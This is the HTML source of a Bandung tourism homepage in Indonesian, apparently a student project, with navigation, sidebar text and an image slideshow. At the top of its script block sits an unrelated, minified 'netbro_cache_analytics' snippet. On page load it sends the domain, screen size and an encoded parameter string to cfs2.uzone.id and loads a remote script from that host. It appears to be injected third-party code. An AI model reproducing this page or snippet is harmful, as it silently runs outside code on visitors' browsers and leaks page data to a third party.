<!DOCTYPE html>
<html>
<head>
<style>

nav {
	/*margin:auto;*/
	/*text-align: center;*/
	width: 100%;
} 

nav ul {
	background: #ACCE22;
	padding: 0 0px;
	list-style: none;
	position: relative;
	display: inline-table;
	/* width: 100%; */
}

nav ul a img{
	display: block;
	padding: 12px;
	color: #fff;
	text-decoration: none;
	float: right;
}

nav ul:after {
	content: ""; 
	clear:both; 
	display: block;
}

nav ul ul {
	display: none;
}

nav ul li:hover > ul{
	display: block;
	width: 150px;
}

nav ul li{
	float:left;
}

nav ul li:hover{
	background:#666;
}

nav ul li:hover a{
	color:#fff;
}

nav ul li a{
	display: block;
	padding: 25px;
	color: #fff;
	text-decoration: none;
}

nav ul ul{
	background: #ACCE22;
	border-radius: 0px;
	padding: 0 20px;
	position: absolute;
	top:100%;
}

nav ul ul li{
	float:none;
	text-align: center;
	border-top: 1px soild #ACCE22;
	border-bottom: 1px solid #ACCE22;
	position: relative;
}

nav ul ul li a{
	padding: 20px 0px;
	color: #fff;
}

nav ul ul li a:hover{
	background-color: #666;
}

nav ul ul ul{
	position: absolute;
	left: 50%;
	top: 0;
	padding: 0px 0px;
}

.badan{
	height: 550px;
}
/*bagian sidebar*/
.badan .sidebar{
	background: white;
	text-align: center;
	float: left;	
	width: 25%;
	height: 100%;
}
 
/*akhir sidebar*/
 
.badan .content{
	float: left;
	height: 100%;
	width: 75%;
	max-width: 1200px;
	position: relative;
	margin: auto;	
}

.prev, .next {
	cursor: pointer;
	position: absolute;
	top: 50%;
	width: auto;
	margin-top: -22px;
	padding: 16px;
	color: white;
	font-weight: bold;
	font-size: 18px;
	transition: 2s ease;
	border-radius: 0 3px 3px 0;
}
.numbertext{
	color: ;
	font-size: 12px;
	padding: 8px 12px;
	position: center;
	top: 50%;
}

.next {
	right: 0;
	border-radius: 3px 0 0 3px;
}

.dot {
	cursor:pointer;
	height: 13px;
	width: 13px;
	
	margin: 0 2px;
	background-color: #bbb;
	border-radius: 50%;
	display: inline-block;
	transition: background-color 2s ease;
}


</style>    
</head>

<body>
<div class="navbar">
	<nav>
		<ul>
			<li><a href="alamatnya">Home</a></li>
			<li><a href="#">View</a></li>
			<li><a href="#">List</a>
				<ul>
					<li><a href="alamatnya">Wisata Budaya</a></li>
					<li><a href="alamatnya">Wisata Alam</a></li>
				</ul>
			</li>
			<li><a href="#">About Us</a></li>
			<a href="#Menu4"><img src="Picture\Line.png" width=3%></a>
			<a href="#menu5"><img src="Picture\Twitter.png" width=3%></a>
			<a href="#menu6"><img src="Picture\Instagram.png" width=3%></a>
		</ul>
	</nav>
</div>
<div class="badan">			
	<div class="sidebar">
		<img src="Picture\Bandung.png" style="width:20%">
		<h3>Pariwisata Kota Bandung</h3>
		<p>Mengembangkan Sumber Daya Manusia dan Kelembagaan Kepariwisataan yang profesional, berkarakteristik sunda dan berwawasan global;<br>Meningkatkan pelestarian, pemberdayaan pengembangan  dan pemanfaatan kebudayaan dan kesenian;
		<br>Meningkatkan destinasi pariwisata kota yang berdaya saing tinggi baik pada tingkat regional nasional maupun internasional;</p>
		<a class="visit" href="#visit">Visit Now</a>
	</div>
	<div class="content">
		<div class="mySlides fade">
			<img src="Picture\Page1.1.png" style="width:100%">
		</div>

		<div class="mySlides fade">
			<img src="Picture\Page1.2.png" style="width:100%">
		</div>
		
		<div class="mySlides fade">
			<img src="Picture\Page1.3.png" style="width:100%">
		</div>
		<a class="prev" onclick="plusSlides(-1)">&#10094;</a>
		<a class="next" onclick="plusSlides(1)">&#10095;</a>
	</div>
	<div style="text-align:center">
		<span class="dot" onclick="currentSlide(1)"></span> 
		<span class="dot" onclick="currentSlide(2)"></span> 
		<span class="dot" onclick="currentSlide(3)"></span> 
	</div>
</div>
<script type="text/javascript">
    if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnwugHnQ%2f%2f1W3q%2bQURlegSOlN%2bWmuLWmq4RWjglhX8SfJE8uAe0tvEgc5wtVtBKq92rg6Lzggx6ZVYZEaHTgKrQpxf0%2fG%2bVF6%2bbbABfAsFvvTO0Dotdeqws%2fxgXKZaIob3k8F0YWKh%2biSNY60wRPyBbDchNzl5281IWR0OO7SnCmRNUksFN9%2fTmdwfqFyer3Rnsse%2fS7%2fccTFtU8FbJKDVw9KyAvf8m%2fqEyp93EJm5rTKzlp8Pc5oIW%2fF8l6%2bGItIpsj4W3d8800xdRjFI2ClWOfQh5YlVPWU1p1FqlVsl6fz6uQvggrC1JCPt1H4JFUnIiPVKIVNMv63hX%2bhO5jfb8hdAdY0EAWtpPhQnKSPZuPVJs0Va6BRRUCGUpIiLNt7%2f6BaZBVp1IgwWMVsOb7ftIpLKCcwfV%2fB8xzwzMOnHvreXtadssaImYcu3gNwhQiUdQCtwD5WddcR%2f0dhQQLoRQ5oZ%2bD9Jjo9%2bJ%2fFAraK%2bL6EMq50ghZlccKCrgb0bH6mPqbx5CDilWVnABlL56TL%2bKpCQCW3l9b7k13eAFeugHaK95ehGeW21m%2fyOvB6Fqeh9" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
    
    var slideIndex = 1;
    showSlides(slideIndex);

    function plusSlides(n) {
      showSlides(slideIndex += n);
    }

    function currentSlide(n) {
      showSlides(slideIndex = n);
    }
    var slideIndex = 0;
    showSlides();

    function showSlides() {
        var i;
        var slides = document.getElementsByClassName("mySlides");
        for (i = 0; i < slides.length; i++) {
            slides[i].style.display = "none"; 
        }
        slideIndex++;
        if (slideIndex> slides.length) {slideIndex = 1} 
        slides[slideIndex-1].style.display = "block"; 
        setTimeout(showSlides, 5000); // Change image every 2 seconds
    }
    function openNav() {
        document.getElementById("mySidenav").style.width = "250px";
        document.getElementById("main").style.marginLeft = "250px";
    }

    function closeNav() {
        document.getElementById("mySidenav").style.width = "0";
        document.getElementById("main").style.marginLeft= "0";
    }
    function myFunction() {
        var popup = document.getElementById('myPopup');
        popup.classList.toggle('show');
    }    
</script>
	
</body>
</html>